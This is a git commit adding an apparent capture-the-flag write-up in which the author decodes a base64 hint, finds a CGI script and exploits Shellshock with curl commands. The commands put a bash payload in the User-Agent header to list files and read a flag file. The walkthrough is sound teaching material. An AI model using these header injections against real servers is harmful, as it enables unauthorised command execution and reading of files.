Create Shellshock.md

2024-11-21 19:43:03 +00:00 · 2020-11-08 05:28:08 -05:00 · 2020-11-08 05:28:08 -05:00 · 3cc0033f7b
commit 3cc0033f7b
parent 18b65de71f
1 changed files with 49 additions and 0 deletions
--- a/2020/Shellshock.md
+++ b/2020/Shellshock.md
@ -0,0 +1,49 @@
+<img src="https://imgur.com/NS6QZ4p.png"/>
+
+Looking at the source code we find base64 encoded text
+
+```
+Like the way you think spidey Y2dpLWJpbi90ZXN0LnNo 
+```
+
+On decoding
+
+<img src="https://imgur.com/XVHZYRf.png"/>
+
+I did a `nikto` scan and found that this is vulnerable to `shellshock`
+
+
+I search on google about `cgi-bin` and found that they are mostly vulnerable to `shellshock` that allows execution of bash commands
+On refering to this blog post
+
+
+`https://wywyit.medium.com/ritsec-fall-2018-ctf-week-6-45d414035c76`
+
+
+I used
+
+```
+curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'find / -type "*.txt"'" http://challenges.ctfd.io:30328/cgi-bin/test.sh
+```
+
+And it gave me a bunch of files
+
+<img src="https://imgur.com/VxDcMQi.png"/>
+
+At the bottom I found
+
+```
+/usr/lib/python3.8/LICENSE.txt                                            
+/tmp/bash-4.3/doc/article.txt                                             
+/tmp/bash-4.3/doc/fdl.txt                                                 
+/tmp/bash-4.3/examples/INDEX.txt                                          
+/home/admin/root.txt                                                                                                                                
+/home/herman/user.txt  
+```
+
+```
+Bsides Islamabad# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /home/herman/user.txt'" http://challenges.ctfd.io:30328/cgi-bin/test.sh
+
+Bsides-PK-Fl4g{sinister_six}
+```
+And that was our flag !